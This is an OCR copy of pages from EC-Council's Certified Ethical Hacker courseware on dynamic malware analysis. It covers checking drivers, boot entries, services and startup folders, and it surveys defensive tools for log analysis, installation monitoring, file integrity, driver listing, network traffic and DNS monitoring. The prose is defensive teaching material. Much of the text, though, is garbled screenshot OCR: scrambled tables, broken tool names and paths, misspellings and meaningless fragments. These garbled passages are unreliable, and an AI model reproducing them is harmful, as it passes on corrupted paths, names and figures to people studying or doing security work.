Explorer\MenuExt

Step 2: Check device drivers automatically loaded Navigate to

C: \Windows\System32\drivers

to check the device drivers.

‘TD drivers

Ped NL Sort

Windows >

Ye Quick access

Gl Desktop Downloads

Documents WR Pictures O Music Ei Videos @ OneDrive y Wi Thispc

> ll Desktop Documents & Downloads

> @ Music WR Pictures 426 items

Name

= view

m32_> drivers

Search driver

Date modified

‘Ti DriverData

6/5/2021 5:10

Type AM

Size

File folder

‘Then-us

File folder

Mete

File folder

‘Si umoF

File folder

‘Tawd B) 3waresys

File folder System file

105 KB

[S) 13940hci.sys

System file

288KB

System file

818 KB

[ AcpiDev.sys

System file

52KB

8) acpiex.sys

System file

161 KB

System file

44KB

System file

48 KB

System

file

43 KB

System file

684 KB

B acpisys

27

IB acpipage.sys

B) acpipmisys DB acpi: B) Acx01000.ys

System file

8) adpaOxx.sys

Figure 7.97: Screenshot displaying drivers folder

Module 07 Page 1137

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

Step 3: Check boot. ini or bcd (bootmgr) entries Check boot.ini or bcd (bootmgr) entries using the command prompt. Open command prompt with administrative privileges, type bcdedit, and press Enter to view all the boot manager entries. BH Administrator: Command Prompt

-

a

x

Figure 7.98: Screenshot displaying boot info =

Step 4: Check Windows services that start automatically Go to Run > Type services.msc and press Enter. Sort the services by Startup Type to check the Windows services list for services that automatically start when the system boots.

Module 07 Page 1138

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Services

-

File Action View Help

o

x

Startup Type

Log

Manual

Loc:

¢9\m\S3\Bm|>>aup

Services (Local) [oo Senices(loc)

Select an item to view its description.

Name

°

Description

Status.

‘PActiver installer (AxlnstSV) Provides Us. ‘GhAdobe Acrobat Update Sere. Adobe Acro... Running ‘QhAgent Activation Runtime... Runtime for. ‘GhAlloyn RouterService —_—Router Allo. ‘GhApp Readiness

Gets apps re.

‘GyBitLocker Drive Encryption...

BDESVC hos..

‘Application Host HelperSer... Provides ad. ‘GhApplcation Identity Determines. ‘GhApplcation information Facilitates... ‘GhApplcstion Layer Gateway... Provides su.. ‘QhApplcation Management Processesin QLAPPX Deployment Service... Provides inf... ‘hAssignedAccessManagerSe...AssignedAc.. ‘QAuto Time Zone Updater Automat QLAVCTP service Thisis Audi... ‘Background Inteligent Tran... Transferfil ‘Background Tasks infrastruc... Windows in... ‘©hBase Filtering Engine TheBaseFil..

Manual Automatic Manual Manual (Tig...

Running Automatic Manual (ig... Running Manual (ig... Manual Manual Running Manual (ig... Manual (rig... Disabled Running Manual (ig... Manual Running Automatic Running Automatic

Loc | Loc: Loc: Loc

Loc: Loc: Loc: Loc: Loc: Loc: Loc: Loc: Loc: Loc: Loc: Loc:

Manual (Trig... Loci

‘©pBlock Level Backup Engine... The WBENG.. ‘GyBluetooth Audio Gateway’... Service sup. ‘LBluetooth Support Service The Bluetoo.

Manual Loc: Manual (Tig... Loc: Manual (ig... Loc:

|\ Extended /(Standard,

Figure 7.99: Screenshot displaying services

=

Step 5: Check the Startup folder Startup folders store applications or shortcuts to applications that auto-start when the system boots. To check the Startup applications, search the following locations in Windows 11: ©

C:\ProgramData\Microsoft\Windows\Start

Menu\Programs\Startup

©

C:\Users\ (User-Name) \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Another method to access startup folders is as follows: 1.

Press Windows + R simultaneously to open the Run box

2.

Type shell: startup in the box and click OK to navigate to the startup folder & Run

x

=

‘Type the name of a program, folder, document, or Internet

Open:

| shelkstartup

resource, and Windows will open it for you.

v

Figure 7.100: Screenshot showing shell: startup command in the Run box

Module 07 Page 1139 :

Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohibi

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Startup Program Monitoring Tool: Autoruns for Windows

Source: https://docs.microsoft.com This utility can auto-start configured to run during Windows processes them. and other registry keys, explorer shell extensions, start services.

the location of any startup monitor, display what programs are system bootup or login, and show the entries in the order that Once this program is included in the startup folder, Run, RunOnce, users can configure Autoruns to show other locations, including toolbars, browser helper objects, Winlogon notifications, and auto-

Autoruns' Hide Signed Microsoft Entries option helps the user to zoom in on third-party autostart images that are added to the user’s system, and it provides support for checking the autostart images configured for other accounts on the system. Autoruns- Sysinternals: wwwsysinternals.com File Search Entry Options Category Help

-

SEIOD/SRZ|t/MED TB Codecs

-

oP Boot Execute EFL imageHijacks CG Appin —- KnownDLls Ap D Network Providers @ saProviders B everthing Bogen Explorer © Internet Explorer BS Autoruns Entry Description | HKCU Softwar\Clazes\"\Shellx\ContestMenuHondlers Be Fiesyncéx Microsoft OneDrive Shell Extension |g HKCU Softwar\Classes\ Directory ShellEx\ContextMenuHondles Je. FileSyncEx Microsoft OneDrive Shell Extension |g HKCU Softwar\Classes\Directory\Background\ hellEx\ContestMenuHondlers Bo Fiesynctx Microsoft OneDrive Shell Extension | HKLM Software\Classes\"\Shellx\ContextMenuHandlers Gis ANotepade+54 ShellNandle for Notepads (6 bt) Microsoft Security Client Shell Extension ‘ee (af HKLM Software| Clarses\Drive\Shellfc\ContextMenuHandlers ep Microsoft Securty Client Shell Extension |g HKLM Software\Classes\Directon\Shellc\ContertMenuHandlers oe Microsoft Securty Client Shell Extension |g HKLM Software| Classes\Folde Shells \DragDropHonclers BB winrar WinRAR shell extension (BS HKLM Software\Microsoft\Windows\CurrentVersion\Explores\ShelconOverayldentifers Go Onedrivet Microsoft OneDrive Shell Extension Microsoft OneDrive Shell Extension Be Onediive? Go Onedrives Micrzof& OneDrive Shell Extension Be Onediives Microsoft OneDrive Shell Extension

@

x

Winlogon EB WinsockProviders Print Monitors © office vn scheduled Tacks & Sewices D Dviver Publisher Image Path (Verified) (Werfied) (Veried) (Werfied)

Microsoft Corporation Mictoseft Corporation Microsoft Corporation Notepads

C:\Users\Admin\AppData\Loc C:\Users\Admin\ppData\Loc C:\Users\Admin\ppData\Loc (C\Program Fies\Notepad>+!

(Not Verified) Microsoft Corporati... C:\Program Files\Windows De

(Not Verified) Microsoft Corporati... (Not Verified) Microsoft Corporat. (Werfied winrar GmbH (Werfied) Microseft Corporation (Weried) Microsoft Corporation (Veried) Microsoft Corporation (Weried) Microsoft Corporation

C:\Program Files\Windows De C:\Program Files\Windows De (CAProgram Files\ WinRAR C:\Users\Admin\AppData\Lov :\Users\Admin\AppData\Loc C:\Users\Admin\ppData\Loc C\Users\Admin\AppDatalLoc

Ready Figure 7.101: Screenshot of Autoruns for Windows

Some additional startup programs monitoring tools are as follows: =

WinPatrol (https://www.bleepingcomputer.com)

=

Autorun Organizer (https://www.chemtable.com)

=

Quick Startup (https://www.glarysoft.com)

=

StartEd Pro (https://www.outertech.com)

=

Chameleon Startup Manager (https://www.chameleon-managers.com)

Module 07 Page 1140

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Dynamic Malware Analysis: Event Logs Monitoring/Analysis @ Log analysis is a process of analyzing

computer-generated recordsor activities to identify malicious or suspicious events @ Use log analysis tools like Splunk to identify suspicious logs or events with malicious intent

Log Analysis Tools @ ManageEngine Event Log Analyzer

(https://www.manageengine.com)

CE H

Itisa SIEM tool that can automatically collect all the

Splunk

| events logs from all the systems present in the network

a

=

Sa

Pars

New Search

="

© Loggly (http://www. loggly.com)

a -s

2

tt sok. com

@ SolarWinds Log & Event Manager (LEM) (https://www.solarwinds.com) @ Netwrix Event Log Manager (https://www.netwrix.com)

Event Logs Monitoring/Analysis Log analysis is a process that provides the details of an activity or event that can extract possible attacks in the form of Trojans or worms in the system. It serves as a primary source of information and helps in identifying security gaps. This process helps in detecting zero-day backdoor Trojans or any possible attacks (failed authentication/login attempts) when logs are analyzed for different components. Log monitoring can be performed for components that perform security operations, such as firewall systems, IDS/IPS, web servers, and authentication servers. The logs also contain file types, ports, timestamps, and registry entries. In Windows, system logs, application logs, access logs, audit logs, and security logs can be analyzed in Event Viewer under the section “Windows Logs.”

Logs are located via the following paths: =

System logs

Start > Windows Administrative Tools > Event Viewer > Windows Logs =

System Security logs

Start > Windows Administrative Tools =

> Event Viewer > Windows Logs > Security

Applications and Services Logs Start > Windows Administrative Tools > Event Viewer > Applications and Services

Logs

Module 07 Page 1141 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Log Analysis Tools: =

Splunk Source: https://www.splunk.com It is an SIEM tool that can automatically collect present in the network. Splunk forwarders need network that need to be monitored, and these event logs from the network systems to the main

€ > SO

lecathost:

a

icoruata

all the event logs from all the systems to be installed in all the systems in the forwarders will transfer the real-time Splunk dashboard.

foot

C:\Program Files\Suricata\log\tastiog Figure 7.102: Screenshot of Splunk

Some additional log monitoring/analysis tools are as follows: =

ManageEngine Event Log Analyzer (https://www.manageengine.com)

=

Loggly (https://www.loggly.com)

=

SolarWinds Log & Event Manager (https://www.solarwinds.com)

=

Netwrix Event Log Manager (https://www.netwrix.com)

Module 07 Page 1142

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

Dynamic Malware Analysis: Installation Monitoring @ When the system or users install or uninstall any software application, there is a chance that traces of the application data are left on the system @ Installation monitoring will help in detecting hidden and background installations that the malware performs ‘@

CEH

Mirekusoft Install Monitor It automatically monitors what gets placed on your system and allows you to completely uninstall it

Use installation monitoring tools such as Mirekusoft Install Monitor for monitoring the installation of malicious executables

© @ @ @

Installation Monitoring Tools SysAnalyzer (https://www.aldeid.com) Advanced Uninstaller PRO (https://www. advanceduninstaller.com) REVO UNINSTALLER PRO (https://www.revouninstaller.com) Comodo Programs Manager (https://www.comodo.com)

Installation Monitoring When the system or user installs or uninstalls any software application, traces of the application data might remain on the system. To find these traces, you should know the folders modified or created during the installation process as well as the files and folders that have not been modified by the uninstall process. Installation monitoring helps in detecting hidden and background installations performed by malware. Tools such as SysAnalyzer can be used to monitor the installation of malicious executables.

Module 07 Page 1143 :

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats =

Exam 312-50 Certified Ethical Hacker

Mirekusoft Install Monitor

Source: https://www.mirekusoft.com Mirekusoft Install Monitor automatically monitors what is placed on your system and allows you to uninstall it completely. It works by monitoring resources (such as file and registry) that are created when a program is installed. It provides detailed information about the software installed. Furthermore, it helps you to determine the disk, CPU, and memory consumption of your programs. It also provides information about how often you use different programs. A program tree is a useful tool that can show you which programs were installed together. Mirekusoft install Monitor

‘Manage and uninstall progrems. Select multiple programsto batch uninsal

Name PE Micekucot install Monitor (5 Microsoft SL Server

Publisher

W)Microsoft Visual

BB dove Acrobat 0¢ 64-bit) @ WicrosottOnedrive Wa Microsoft Edge WebView2 Runtime @ sofPerect Network Scanner version 8.13 © oo9 [Gi Notepad+~ (64-bit x64) -G}}ava8 Update 321 (64-bit) ‘{DMozilia Maintenance Service Ei) Microsoft Update Health Tools Ek winkan 6.10 64-bit) TB) Microsoft Edge Update

Microsoft Corporation Microsoft Corporation Microsoft Corporation SoftPerfect Py Ltd Google Notepas Oracle Corporation Riverbed Technology, Inc. Mozilla Microsoft Corporation winrar Gmbkt

Publisher: Ruware Version: 35:5.2017.8 Wate: Today, Api 62022, 22 minutes ago (Size: 4.05 MB (4253247 bytes) Size of registry: 1.52 KB (1565 bytes) |About: httos//snww.winpatrol.com

Installed 416122740 AM 4/6/2273 AM 4/8/2273 AM M.

Size 250 KB 19.1 MB 831K 831 KB.

4/6722 657 AM 4/6/2648 AM 418/22.647 AM 416122647 AM 416122.647 AM 4/622.6:44 AM 4/8/22. 6:40 AM 2/9/22 122. 8M 22722.11:15 PM 2/2/22 11:05 PM, 2/2/22 1053 PM. 1/27/22 138 AM 126/22 11334P..

206 MB 728 MB, 530M8 486 MB 492. MB 19.78 535 MB 250KB 225 MB 11aKe 905 KB 102 MB 7.2MB

Version 48,1080. 402876. 14:16.27033.0

View > Search programs Last Used Usage

22.001.20085 2208502270. 100.0.185.29 100.0.18529 813 100.04896.75. 824 8032107 4102900 9603 28700 6.100 13.5585,

Contains: 23 Files, Registry: 2 Keys, 23 Values

Figure 7.103: Screenshot of Mirekusoft Install Monitor

Some additional installation monitoring tools are as follows: SysAnalyzer (https://www.aldeid.com) Advanced Uninstaller PRO (https://www.advanceduninstaller.com) REVO UNINSTALLER PRO (https://www.revouninstaller.com)

Comodo Programs Manager (https://www.comodo.com)

Module 07 Page 1144

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Dynamic Malware Analysis: Files and Folders Monitoring @ Malware programs normally modify system files and folders after infecting a computer @

Use file and folder integrity checkers like PA File Sight, Tripwire, and Netwrix Auditor to

CE H

PA File Sight

@ Itaudits who is deleting files, moving files, or reading files. It also detects users copying files and optionally blocks access

detect changes in system files and folders

File and Folder Integrity Checking Tools

© Tripwire File integrity and Change Manager (https://www.tripwire.com)

By serverzozz

@ Netwrix Auditor (https://www.netwrix.com)

© Verisys (https://www.ionx.co.uk) © CSP File Integrity Checker (https://www.cspsecurity.com) © NNT Change Tracker (https://www.newnettechnologies.com)

Files and Folders Monitoring Malware can modify the system files and folders to save some information in them. You should be able to find the files and folders that the malware creates and analyze them to collect any relevant stored information. These files and folders may also contain hidden program code or malicious strings that the malware would schedule for execution according to a specified schedule. Scan for suspicious files and folders using tools such as PA File Sight, Tripwire, and Netwrix Auditor, to detect any Trojans installed as well as system file modifications.

Module 07 Page 1145 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

PA File Sight

Source: https://www.poweradmin.com PA File Sight is a protection and auditing tool. It detects ransomware attacks coming from the network and stops them. Features: o

Compromised computers are blocked from reaching files on other protected servers on the network

o

Detects users copying files and optionally blocks access

o

Real-time alerts allow appropriate staff to investigate immediately

o

Monitors who is deleting, moving, or reading files

@ Parle Sight Ure Console -vB-4.0.174 [ Connected to WINDOWSI1 as Admin J - Licensed te: PA File Sight v8 Ul Tal License (30 days left) File View Configuration Settings Licensing Alerts Help

Ps

© st sevice

eos

res

-

| YOUR LOGO HERE | Sistteatamoe* Watch C:\Users\Adr &

[Eh inventory Collector

SERVER2022

Group Reports

‘SERVER2022 remote satelite

x

i

ve

2 amen

@

Updated

AllReports

System Information NT AUTHORISYSTEM [Lo90nU ¢¢6) =< | NT AUTHORITYISYSTEM [evchost exe] [-—=—=—=—=— NT AUTHORITYILOCAL SERVICE [svchost ¢1¢) —$—=——

Total vO Reads mites Meketes

CEMininsto opore| ——— CEM AdminEator notepad oe) CEHAaminstatorevchostxe) -—— NT AUTHORITYISYSTEM [PAAPIProxy32.638] [—

ue pound =

NT AUTHORITY'SYSTEM [127.001] -—=—=—=" NT AUTHORITY'SYSTEM [sass exe] [-————=—=—= NTAUTHORITYSYSTEM [iiss o3) =e 1

All Actions

Reports

Ga

|

10

Hourly Alert Rate



100

4,000

show desktop

5

+

Figure 7.104: Screenshot of PA File Sight Some additional file integrity checking tools are as follows: =

Tripwire File Integrity and Change Manager (https://www.tripwire.com)

=

Netwrix Auditor (https://www.netwrix.com)

=

Verisys (https://www.ionx.co.uk)

=

CSP File Integrity Checker (https://www.cspsecurity.com)

=

NNT Change Tracker (https://www.newnettechnologies.com)

Module 07 Page 1146

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Dynamic Malware Analysis: Device Drivers Monitoring @

Malwareis installed along with device drivers

downloaded from untrusted sources, and attackers use these drivers asa shield to avoid detection

|@ Use device driver monitoring tools such as DriverView to scan for suspicious device drivers and verify if the device drivers are genuine and downloaded from the publisher's original site

C

DriverView

DriverView utility displaysa list of all the device drivers currently loaded on the system along with information such as load address of

the driver, description, version, and product name

@ Goto Run > Type msinfo32 > Software Environment

> system Drivers to manually check for installed drivers

ya

Device Driver Monitoring Tools

© Driver Booster (https://www.iobit.com) © Driver Reviver (https://www.reviversoft.com) © Driver Easy (https://www.drivereasy.com) © Driver Fusion (https://treexy.com)

© Driver Genius 22 (https://www.driver-soft.com)

=

Device Drivers Monitoring Malware is installed on the system along with the device drivers when the user downloads infected drivers from untrusted sources. The malware uses these drivers to avoid detection. One can scan for suspicious device drivers using tools such as DriverView and Driver Detective, to verify whether they are genuine and whether they have been downloaded from the publisher’s original site. The path to the location of Windows system drivers is as follows: Goto Run > Type msinfo32 > Software Environment > System Drivers |B Sytem information Fle Edt View Help ‘System Summary {Hardware Resources {Components © Softnare Enaronment ans mironment varies Toe dione eee Aa ses ee Program Groups Stomup Programs OLE Resisraton Windows Error Reporting

Find what Cisearch selected category only

Name Description Fle “ype 1394 compha. z el ware Share lwindows\s...Kemel api Microsoft ACP Driver ciwindows\s...Kemel facpidev _ACPLDevies driver windows\s. Keel acpiex Microsoft ACPEX Dri. cwindows\s..Kemel aepipagr ACPI Processor Agr... cwindows\s..Kemel acpipmi —_ACPLPower Meter Dr. c\windows\s...Kemel acptime ACPI Wake Alarm Dri. e\windows\s.. Kernel ‘01000 Ac01000 lwindows\s..Kemel adpeoee —ADPa0K windows\s...Kemel ats Ancilary Function Ori. ciwindows\s...Kemel \windows\s... Keel fui func aheache Application Compa... cwindows\s...Kemel amdgpic2 AMD GPO CertOri. ciwindows\s..Kemel amd2c AMD 2C Controler...\windows\s.. Kemel amdkd AMOS ProcessorD_. c\windows\s..Kemel lamdppm AMD Processor Driver ciwindows\s...Kemel amdsataamdsata windows\s...Kemel amdsbs —amdsbs windows\s.. Keel famdeata amet windows\s...Kemel appid App Driver Cwindows\s...Kemel Cseaceh category names onty

Start. Drvet_No_ Driver Yes Driver Yes Driver No Driver Yes Driver No Driver No Driver No Driver No Driver Yes Driver Yes Driver Yes Driver Yes Driver No Driver No Driver No Driver No Driver Yes Driver Yes Driver Yes Driver No

-

ox

Stan Mode Manual Manwal oct Manual Soot Manual Manual Manwal Manual Manual System system System Manual Manual Manual Manual Marval Manval_ Manwal Manual

state Stop Running Running Stopped Ruming Stopped Stopped Stopped Stopped Running Running Rung Running Stopped Stopped Stopped Stopped Running Running Running Stopped

4

lose Find

Figure 7.105: Screenshot displaying Windows System Drivers

Module 07 Page 1147 :

Ethical Hacking and Countermeasures Copyright © by E6-Goul All Rights Reserved. Reproduction is Strictly Prohibi

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

DriverView

Source: https://www. nirsoft.net The DriverView utility displays the list of all device drivers currently loaded in the system. For each driver in the list, additional information is displayed, such as load address of the driver, description, version, product name, and maker. Features:

©

Displays the list of all loaded drivers in your system

o

Standalone executable

& Driverview

-

ile fait View Options Help Bag

o

xXx

oan

DiverName / Address End Address | Sie load Count index FileType Description version Company Bi g2waresys FFFFFOODG..FFFFFOO06.0001C000 166 SytemDriver LSl3waresCSiStorport Drives S051 1S @Acrisys ——FFFFFBODS... FFFFFRODS... 0x000cc000 1 24 SystemDiver—ACPIDriverforNT 10002000489 Microsoft Corpor @rcpiersys —_FFFFF0006... F¥FFFa00S... 000026000 1 20 Dynamic Linki. ACPIEx Driver 100220001 Microsoft Corpor @avrcoxxsys FFFFFeOns... FFFFFEOO... oxoN25c000 1 $3 SystemDiver_PMC-SieraStorport DrverFor SPC... 130.1076 PMC-Siera Qstasys FFFFFEODS,..FFFFF2O0%S,.. 000034000 1 151 System river Ancilary Function Drverfor WinSock 100022000:194 Microsoft Corpor @otunixsys ——FFFFFO00S... FFFFFaODS... 000012000 1 150 System Driver AFLUNKK socket provider 10022000348 Microsoft Corpor @ehcachesys _FFFFFEODS... FFFFFEDU... 000053000 1 167 System river___Appication Compatibity Cache —10.022000.1 Microsoft Corpor Advanced Micro 143277 AHCI 1.3 Device Driver 67 System Driver _FFFFFEOUS... FFFFFEO... Ox0001f000 1 @amdsatasys @omaibsays —_FFFFFO0D6... FFFFF206... 000067000 1 6 SjstemDiiver_ AMD Technology AHCI Compatible... 7.154043 AMD Technolog @omaxstasys —FFFFFEODS.,. FFFFFEDUS... Oc0O0D000 1 68 SyetemDiiver Storage FiterDiver 33277 ‘Rdvanced Micro @Applessd.sys FFFFFOOOS... FFFFF2O0S... 000023000 1 6 Unknown ‘Apple Sli State Drive Device 6172001 Applet. @orcsazsys ——_FFFFFEO08... FFFFFED0%... oo0025000 1 70 System Driver Adaptec SAS RAID WSO Driver 7032018 PMC-Sierra Ine @etapisys ——_FFFFFEODS... FFFFFEOU%... cxoD00d000 1 89 SystemDiiver_—_ATAPIIDE Miniport Driver 10022000258 Microsoft Corpor @rponsvs —_FFFFFOODS... FFFFFBO0S... 00003000 1 90 System Driver _ATAP| Driver Extension 10022000258 Microsoft Corpot Microsoft Corpor 10.0.22000.1 System Driver. © BAM Kemel Driver 166 FFFFF000'.. FFFFFEOO'... 0x00018000 1 @ramsys @esicdieplayays FFFFFBODS... FFFFFRODS... 0100015000 1 142 Display Driver Microsoft Basic Display Driver 100220001 Microsoft Corpor @essicRendersys FFFFFEODS... FFFFFEOU%... OxOO0TT000 1 143 Display Driver Microsoft Basic Render Driver 100220001 Microsoft Corpot Microsoft Corpor 10.022000.1 BEEP Driver System Driver. 139 FFFFFBOOS... FFFFFBOO6... 000003000 1 Qbeepsvs @rinaeesys —_FFFFFEOO'S... FFFFFEOO'S... 0000230001 208 System Diver Windows Bind Fite Driver 1002200034 Microsoft Corpor @eoor.a —FFFFFEODS.. FFFFFEDU... OxOO0Db000 1 7 Display Diver VGA Boot Driver 100220001 Microsoft Corpor @bonsersys —_FFFFFOODS... FFFFF9008... 000027000 1 200 System Diver NTLan Manager Datagram Receiver... 10.022000.48 Microsoft Corpor @oeiesys —_-FFFFFB0O8... FFFFF8008... 000100001 116 System river VHD BTT Fite Driver 100220001 Microsoft Corpor @rrvodasys —FFFFFEOD... FFFFFEOU%... 000080000 1 59 Network Diver QLogic Gigabit EthemetVED 73231105 QLogic Corporati @csa.ai FFFFASAD.. FFFFARAD... 000012000 1 195 Display Driver Canonical Display Driver 10022000434 Microsoft Corpor @cdtssys FFFFFOOO8... FFFF2008... 00001100 1 23 SystemDiver CD-ROM File Sytem Driver 100.22000.1 Microsoft Corpor @carornsys —_FFFFFEODS.,. FFFFFEOUS... Oro0030000 1 135. System Driver SCSICD-ROM Driver 100220001 Microsoft Corpor @cerys FFFFFOODS... FFFFF@006... 000017000 3 38 —_DynamicLinkLi. Event Aggregation Kernel Mode Library 100220001 Microsoft Corpor Ociesex6ioys —FFFFFEO0S... FFFFFEOD%... Oco005c000 1 87 SysterDiver__Cheksio iSCSI VMinipor Driver 6114100 Celso Commut @ciai FFFFFEODS... FFFFFEO0S,.. Ox000et000 2 158 SystemDriver__Code Integrty Module 10022000469 Microsoft Corpor @ccimessvs —_FFFFFH00S... FFFFFa00S... 000025000 1 146 Dynamic Link Li. CimFS diver 10022000469 Microsoft Corpor @reincconocvs seEEFINNR FEEEEAMTE nvonnmmnnn 2 nos CFI er Siren nn 72000 104 Mirenenfe Cnet 2Titem(), 1 Selected Figure 7.106: Screenshot of DriverView

Some additional device driver monitoring tools are as follows: =

Driver Booster (https://www.iobit.com)

=

Driver Reviver (https://www.reviversoft.com)

=

Driver Easy (https://www.drivereasy.com)

=

Driver Fusion (https://treexy.com)

=

Driver Genius 22 (https://www.driver-soft.com)

Module 07 Page 1148

Ethical Hacking and Countermeasures Copyright © by EC-Cot All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

Dynamic Malware Analysis: Network Traffic Monitoring/Analysis ‘@ Malware programs connect back to their handlers

and send confidential informationto attackers

(@ Use network scanners and packet sniffers to monitor

network traffic going to malicious remote addresses

@ Use network scanning tools such as SolarWinds NetFlow Traffic Analyzer and Capsa to monitor

CE H

SolarWinds NetFlow Traffic Analyzer

Traffic Analyzer collects trafficdata, correlatesit into NetFlow

a useable format, and presentsit to the user in a web-based

interface for monitoring network traffic

el

network traffic and look for suspicious malware activities Network Activity Monitoring Tools © Caspa Network Analyzer (https://www.colasoft.com) e Wireshark (https://www.wireshark.org) @ PRTG Network Monitor (https://kb.paessler.com) e GFI LanGuard (https://www.gfi.com) e NetFort LANGuardian (https://www.netfort.com)

Network Traffic Monitoring/Analysis Network analysis is the process of capturing network traffic and investigating it carefully to identify malware activity. It helps to determine the type of traffic/network packets or data transmitted across the network.

Malware depends on the network for various activities such as propagation, downloading malicious content, transmitting sensitive files and information, and offering remote control to attackers. Therefore, you should adopt techniques that can detect malware artifacts and usage across networks. Some malware connects back to the handlers and sends confidential information to them. In dynamic analysis, you run a piece of malware in a controlled environment that is installed with various network monitoring tools to trace all the networking activities of the malware. Network monitoring tools such as SolarWinds NetFlow Traffic Analyzer, Capsa Network Analyzer, and Wireshark, can be used to monitor and capture live network traffic to and from the victim’s system during execution of the suspicious program. This will help to understand the malware’s network artifacts, signatures, functions, and other elements.

=

SolarWinds NetFlow Traffic Analyzer Source: https://www.solarwinds.com NetFlow Traffic Analyzer collects traffic data, converts it into a useable format, and presents it to the user in a web-based interface for monitoring network traffic. Features:

o

Network traffic analysis

o

Bandwidth monitoring

Module 07 Page 1149 :

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

o

Application traffic alerting

o

Performance analysis

©

CBQOS policy optimization

©

Malicious or malformed traffic flow identification

Details - EAST-2821-WAN Node ow NetFl Last Hours ~ ingress

©

ow nanaaton

——

4

Top 5 Applications

Top Endpoints

~

[eee

a.

a

a

er

rT

a

a

OM

ke

ome

cam

Figure 7.107: Screenshot of SolarWinds NetFlow Traffic Analyzer

Some additional network activity monitoring tools are as follows: =

Caspa Network Analyzer (https://www.colasoft.com)

=

Wireshark (https://www.wireshark.org)

=

PRTG Network Monitor (https://kb. paessler.com)

=

GFI LanGuard (https://www.gfi.com)

=

NetFort LANGuardian (https://www.netfort.com)

Module 07 Page 1150

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Dynamic Malware Analysis: DNS Monitoring/Resolution ‘@

DNsChangerisa malicious software capable

of changing the system’s DNS server settings and provides the attackers with the control of the DNS server used on the victim's system

(C€ E H

|| DNSQuerySniffer | DNSQuerySnifferis a network sniffer utility that shows the DNS | queries sent on your system

|@ Use DNS monitoringtools such as DNSQuerySnifferto verify the DNS servers that the malware tries to connectto and identify the type of connection

DNS Monitoring/Resolution Tools

© DNSstuff (https://www.dnsstuff.com) ©

UltraDNS (https://neustarsecurityservices.com)

@

SonarLite Web App (https://constellix.com)

ete /fuw.nirsoft net

DNS Monitoring/Resolution Malicious software such as DNSChanger can change the system’s DNS server settings, thus providing attackers with control of the DNS server used in the victim’s system. Subsequently, the attackers can control the sites to which the user tries to connect through the Internet, make him/her connect to a fraudulent website, or interfere with his/her online web browsing. Therefore, you should determine whether the malware is capable of changing any DNS server settings while performing dynamic analysis. You can use tools such as DNSQuerySniffer and DNSstuff, to verify the DNS servers that the malware tries to connect to and identify the type of connection.

Module 07 Page 1151 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

DNSQuerySniffer Source: https://www.nirsoft.net DNSQuerySniffer is a network sniffer utility that shows system. For every DNS query, the following information number, query ID, request type (A, AAAA, NS, MX, and time, duration, response code, number of records, and records. You can easily export the DNS query delimited/XML/HTML file or copy the DNS queries to the into Excel or other spreadsheet applications.

a File Fait View Options Help OLEELE HeaNane —[PotNomber |GueyiD | repatc @Bvidevents.dat.... 65197 1097 Tiwpadiocedo., 45047 -oteg-—«| Host Name: @eooresiden 697 0130 Port Number: Qcxcsmicrosoft... @atidlwindows...

50265 65167

6ac 280

Query:

Peetings-wind... 61009

Foi

Request Time:

Gormsetingste ozs

ta t_—_|

setings win.data.microsof.com (e1009

ll

Request Type:

the DNS queries sent on your is displayed: host name, port so on), request time, response content of the returned DNS information to a CSV/tabclipboard and then paste them

% Fes Coure [A

20.189.173.10

7

cnaNE

_global.asimov.events

20479:972u. wowing com. 18430.282.57 208.111.136..

SRIGTITST

cxes:microsoftneteg wu-bg-shimtraffiem

stings prod-eus2-d

Response Time:

Duration: Response beds: Records Count:

he CNAME:

oO

AAAA:

Ns: Mx

‘SOA:

Pr: SRV:

‘TEXT:

Source Address: Destination Address: IP Country:

Pease

WirSoR Freeware hipliwww.nirsoet Figure 7.108: Screenshot of DNSQuerySniffer

Some additional DNS monitoring/resolution tools are as follows:

=

DNSstuff (https://www.dnsstuff.com)

=

UltraDNs (https://neustarsecurityservices.com)

=

Sonar Lite Web App (https://constellix.com)

Module 07 Page 1152

